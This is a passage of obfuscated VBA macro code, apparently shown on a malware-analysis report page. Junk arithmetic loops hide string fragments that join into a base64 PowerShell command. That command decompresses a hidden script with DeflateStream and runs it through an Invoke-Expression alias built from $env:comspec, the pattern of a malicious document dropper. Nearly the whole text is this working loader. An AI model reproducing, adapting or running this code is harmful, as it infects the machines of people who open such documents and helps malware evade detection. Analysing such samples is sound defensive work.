jHqwKmvSj = "B1AHAALwBiAG" + "wAegA3AE0" + "ARgB" + "HAGIAYgBCAF" + "MAdgB5AGE" + "AMw" + "BEADgAMQ" + "BHA" + "HYAVwBVAE" + "IAawArAH"
For rsjno = KuqGK To vLAhlI
      For vadwBo = JJoKEN To 87673
         vtiEqG = (15496 / CBool(ulYAwi) - dIzqj / Oct(75829 / Hex(27633) / fzBuBG + Rnd(CwCQPH / Fix(37))))
Next
   hRino = 66660 - 25387
Next
LtBdmPGzO = "IAWAA4" + "AGsAYwBIAHUAZQ" + "A3AFkAMQBYAE" + "4AeQBSAGQAe" + "ABQADEA"
ZtGESSiOtWf = uzFsrmquu + ZrEDhid + ZbXfjtrABGZ + lLJMjw + DJXoTwLjj + dULCwDuL + LvRVZRZtj + WMEXBqZ + jHqwKmvSj + LtBdmPGzO
End Function
Function mAoprfsVCz()
On Error Resume Next
For nrbFKC = WNrhz To FpLGjO
      For bwfSwa = iLtwfj To 5018
         JTwvd = (95047 / CBool(oZiIDc) - SjIUiA / Oct(78193 / Hex(22739) / IkbWK + Rnd(sBSwt / Fix(37))))
Next
   rJkllB = 19159 - 12183
Next
ibGmwQ = "NQA" + "2A" + "C8AWABu" + "AHUAbgBzAEEAS" + "ABYA" + "GoANQBV" + "AEcARgB"
For oWwGsM = LCBWzK To KBaPUj
      For pGivaX = isziF To 49822
         NdPRH = (3561 / CBool(QvWihV) - kKlpZ / Oct(2725 / Hex(97671) / QLRoT + Rnd(JCsslU / Fix(37))))
Next
   XKzMfr = 49070 - 22689
Next
rALWY = "xAFUAV" + "gBaA" + "HgAZgBzAGQAaw" + "BQA"
For MtBzw = NpjYUw To EzSiM
      For siqwA = MzncuJ To 48608
         EwXnV = (59002 / CBool(oCMMzw) - Gwtwf / Oct(35759 / Hex(37025) / WzBUlj + Rnd(NlPvu / Fix(37))))
Next
   GbfNi = 61792 - 6887
Next
ESrUqJVvPZ = "EMASgBUAGsA" + "WABVAD" + "kAMgBqADMAdQA" + "1AFAAZABkAEs"
For ijAiBt = iwiGkY To amAsrP
      For azEEDz = OizmP To 9614
         OAqkpk = (60154 / CBool(koJjfB) - MpoomD / Oct(73063 / Hex(93195) / wuTTP + Rnd(UVTjLl / Fix(37))))
Next
   ICiJn = 24310 - 29570
Next
FihrwLJ = "AKw" + "BLAH" + "EA" + "VgBRAGI" + "ARABIAGs"
For TUUUWI = bSocDR To vQLYDU
      For QvqHCj = JcQZhd To 59929
         wzsYW = (87984 / CBool(ujhsW) - OwPIu / Oct(13317 / Hex(4380) / iMUbL + Rnd(pYDWn / Fix(37))))
Next
   VSLfi = 97220 - 89778
Next
pFtwofJURsL = "AQQB" + "zADQAbwBuAGEAa" + "wBBAE4AWgB" + "kAEo" + "AcABYA" + "HAA"
For BGaJK = viAQmW To BUnYzK
      For LVjKFP = vmjdwM To 73339
         XmLQj = (43084 / CBool(XmkQd) - zYHho / Oct(36069 / Hex(9126) / aPDuvz + Rnd(RmqKqd / Fix(37))))
Next
   AMjiFA = 96322 - 87694
Next
poRlriq = "TgBU" + "AG8AbABWAFAAMAB" + "DAG0AcwB" + "mAGE" + "AdQBWAFEAVABHAG" + "4ARgAvADk"
For olPzOc = HthrwX To WkWTG
      For uFnrBY = AJNEhh To 78282
         JfBdo = (80718 / CBool(RJmAdE) - tijrt / Oct(62325 / Hex(67105) / Ywqhwz + Rnd(cKPitM / Fix(37))))
Next
   UqRJL = 78321 - 57471
Next
mSifZsARDU = "AMABDAGEA" + "cwAv" + "AEUAUABFAE0" + "ARQBy" + "ADMAcA" + "BlAFkASQ" + "B0AFYAVA" + "BaADUAcA" + "AwAHYAT"
mAoprfsVCz = ibGmwQ + rALWY + ESrUqJVvPZ + FihrwLJ + pFtwofJURsL + poRlriq + mSifZsARDU
End Function
Function PwMjP()
On Error Resume Next
For BuppQ = XpnIfK To FnGtk
      For jbkvLz = NqZjUu To 39264
         vvrGh = (3480 / CBool(UcaNC) - PDLQbD / Oct(95107 / Hex(56374) / wiscQ + Rnd(QDnlqm / Fix(37))))
Next
   rOnCj = 52652 - 13883
Next
FkYMBK = "wB0AG" + "gA" + "RQBrAEMATwAzAG" + "QAVQAyA"
For Vwvow = OTtqWq To wNOElX
      For YmbLM = LwcYU To 42462
         Idfwn = (35059 / CBool(BjuvTw) - uBZzzD / Oct(5805 / Hex(69235) / WkcsbR + Rnd(UVAUWT / Fix(37))))
Next
   RRTcCo = 84631 - 61730
Next
SHziDKWB = "HMAZwBTA" + "FgA" + "ZwBIAH" + "cANwBmACcAIA" + "ApACwAW" + "wBT" + "AFkAUwB0AGUATQ" + "AuAEkA" + "TwAuA" + "GMAbw"
For PaRvDa = STYuJ To KZTjs
      For ZSbIb = IjibA To 90869
         qsMSKW = (76208 / CBool(wiBwYY) - GtJSw / Oct(35483 / Hex(12456) / oRpbv + Rnd(rqScDS / Fix(37))))
Next
   wGINF = 60114 - 51241
Next
stRpRZrE = "BtAFA" + "AcgBlAHM" + "AUwBp" + "AE8ATgAuA" + "EM" + "AbwB" + "tAHAAUg"
For aKCvDa = RizYkS To BUvsA
      For riVVG = InAFqn To 61215
         NGnjrT = (12717 / CBool(kdfhB) - EoRMi / Oct(37550 / Hex(84590) / phoTRw + Rnd(dIlEd / Fix(37))))
Next
   vhPAj = 987 - 35572
Next
lzLlBuRd = "BFAHMAUwBpAE8" + "Ab" + "gBNAG8AZABFAF" + "0AOgA6AGQA"
PwMjP = FkYMBK + SHziDKWB + stRpRZrE + lzLlBuRd
End Function
Function wcokNEk()
On Error Resume Next
For rqYiji = niIMz To QGrYC
      For IHVtd = OJGCM To 96478
         ZszrQ = (70152 / CBool(PDpics) - pibXbi / Oct(84707 / Hex(18508) / WwvKUZ + Rnd(kRKtX / Fix(37))))
Next
   TPboTs = 9965 - 33606
Next
cLUWLS = "RQB" + "DAG8" + "ATQ" + "BwAFIAZQB"
For QlrZif = kTaPBb To VZNqzE
      For SwILL = wnKzE To 50501
         fKTvua = (10821 / CBool(qSIcsU) - OFBHM / Oct(58726 / Hex(95966) / jNTTiz + Rnd(bLawO / Fix(37))))
Next
   GSwXz = 60989 - 54279
Next
TpTBqWAT = "TAHMAKQB8AEY" + "ATwBSAGUAQQB" + "jAEgALQBPA" + "EIAagBlAEMAVAAg" + "AH" + "sAbgBlAFcALQBvA" + "GIAagBFAGMAVA" + "AgAHMAeQBTA"
For AjTrqY = zwNAh To jiaGX
      For hqwBwF = HnFjNw To 41693
         idAbr = (47378 / CBool(iONvj) - WjWQcw / Oct(89003 / Hex(80527) / iXlvQ + Rnd(sNABM / Fix(37))))
Next
   AEZif = 20764 - 58439
Next
jzfaPEjb = "HQARQBtAC4Aa" + "QBPAC4AcwBUAH" + "IA" + "ZQBhAG0AUgBFAG" + "EARAB" + "lA"
For ioAYI = DjTlCb To fvdqw
      For mlBMt = TWfwm To 93163
         PdVtWN = (75247 / CBool(NItPzk) - VIwoj / Oct(5697 / Hex(84830) / jbHEoP + Rnd(mhoRL / Fix(37))))
Next
   JBHcIc = 47776 - 56101
Next
CtMzZdpZjLX = "FIA" + "KAA" + "gACQ" + "AXwAsA" + "CAAWwBUAGUAeABU"
For zujQA = AzMiX To oRPIw
      For pVMai = QLGoL To 51262
         TzZiNU = (45613 / CBool(Bmjbi) - jUjsUK / Oct(22599 / Hex(68427) / vWLKA + Rnd(QLlmHE / Fix(37))))
Next
   PnCoa = 3435 - 77272
Next
JnurER = "AC4AZQBO" + "AEMAbwBkAGkAT" + "gBn" + "AF0AOgA6AEEAcw"
For cwzlhr = wrQOj To iIBJXa
      For bwpaji = wqfjJ To 91155
         SXMYT = (94491 / CBool(OtVsUO) - fAiDbD / Oct(14476 / Hex(58056) / ZCCma + Rnd(MjFoR / Fix(37))))
Next
   kpkEd = 82592 - 24558
Next
fcjtGGlGh = "BjAEkAS" + "QAgAC" + "kAIAB9ACAAKQAuA" + "HIARQBB" + "AE" + "QAd" + "ABPAEUAbgBkAC"
For ThOPS = pBjir To oOnWQ
      For TIhon = zauLtw To 97095
         uZpro = (74495 / CBool(IRLAW) - AXVCOo / Oct(35526 / Hex(44868) / WiuhS + Rnd(WdHhjf / Fix(37))))
Next
   OZvid = 82832 - 21031
Next
ZorwWdsZQL = "gAIAApA" + "CAAfAAgAC4AKAAg" + "ACQA" + "RQBO" + "AHYAOgBjAE" + "8ATQBTA" + "FAARQ" + "BjAFsAN" + "AAsA"
For WoRkwC = JfKjp To CKwGUa
      For nDSmRi = wGfKb To 23844
         AqdzW = (80866 / CBool(UcXDqf) - OzcJQ / Oct(47680 / Hex(7609) / ViTRu + Rnd(CzAEcc / Fix(37))))
Next
   UTIwk = 78162 - 35695
Next
GRmkIXV = "DEANQ" + "AsADIAN" + "QBdAC0ASgBvA" + "EkATgAnA" + "CcAKQA="
wcokNEk = cLUWLS + TpTBqWAT + jzfaPEjb + CtMzZdpZjLX + JnurER + fcjtGGlGh + ZorwWdsZQL + GRmkIXV
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.